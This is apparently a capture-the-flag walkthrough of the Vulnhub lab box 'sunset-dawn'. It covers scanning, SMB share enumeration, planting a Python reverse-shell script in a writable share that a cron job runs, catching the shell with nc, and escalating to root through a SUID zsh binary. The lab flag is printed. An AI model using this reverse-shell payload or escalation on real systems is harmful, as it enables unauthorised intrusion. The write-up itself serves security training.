Vulnhub: sunset-dawn

This is the second box in the sunset series. These boxes are great for beginners. This box has smb on it and it is always great to practice with smb.

Scanning

Finding the machine on the network

Nmap scan report for 192.168.56.131
Host is up (0.000083s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql

More Scanning

Finding more details about running services

crazyeights@es-base:~$ nmap -A -p- 192.168.56.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-29 18:00 EST
Nmap scan report for 192.168.56.131
Host is up (0.00011s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
[SNIP]
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
[SNIP]

Web:

Index Page:

Enumerating:

Using dirb to look for more files on the server:

crazyeights@es-base:~$ dirb http://192.168.56.131

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Dec 29 18:02:31 2020
URL_BASE: http://192.168.56.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.131/ ----
+ http://192.168.56.131/index.html (CODE:200|SIZE:791)                         
==> DIRECTORY: http://192.168.56.131/logs/                                     
+ http://192.168.56.131/server-status (CODE:403|SIZE:302)  

The directory logs seems promising.

  • In management.log we find several usernames: dawn, ganimedes

  • We can also see that there is several cron jobs running.

  • The management log is the only one we have permission to access.

SMB:

List available shares:

crazyeights@es-base:~$ smbclient -L \\dawn -I 192.168.56.131 -N

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available

Connect to the share ITDEPT:

crazyeights@es-base:~$ smbclient \\\\dawn\\ITDEPT -I 192.168.56.131 -N
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

		7158264 blocks of size 1024. 3478908 blocks available
smb: \> exit

Check if share is writeable:

crazyeights@es-base:~$ smbmap -H 192.168.56.131 -s ITDEPT -d dawn
[+] IP: 192.168.56.131:445	Name: 192.168.56.131                                    
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	ITDEPT                                            	READ, WRITE	PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
	IPC$                                              	NO ACCESS	IPC Service (Samba 4.9.5-Debian)
crazyeights@es-base:~$ 

Looking back to management.log we can see that the cronjob executed ITDEPT/product-control and wbe-control. We could try to create a script of that name and upload it to the writable share.

2020/12/29 18:02:01 CMD: UID=1000 PID=859    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2020/12/29 18:02:01 CMD: UID=33   PID=858    | /bin/sh -c /home/dawn/ITDEPT/web-control 

Created a file product-control containing python reverse shell


python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Started a listener

crazyeights@es-base:~$ nc -lvp 1234
    listening on [any] 1234 ...

Uploaded the file:

crazyeights@es-base:~$ smbclient \\\\dawn\\ITDEPT -I 192.168.56.131 -N
Try "help" to get a list of possible commands.
smb: \> put product-control
putting file product-control as \product-control (6.8 kb/s) (average 6.8 kb/s)
smb: \> 
  • Now have access as user dawn.

  • Look for commands the user can run with elevated privileges.

$ sudo -l
Matching Defaults entries for dawn on dawn:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
$   
  • Couldn’t get this (mysql as root) to work.

  • Look for bins the user can run as effective root:

$ find / -perm -u=s 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
  • Checking gtfo bins

  • zsh allows you to execute commands as a different effective user.

  • Use it to get the root flag:

$ zsh 
id
uid=1000(dawn) gid=1000(dawn) euid=0(root) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
cd /root
ls
flag.txt
pspy64
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}

Feel like I missed something.

FIN.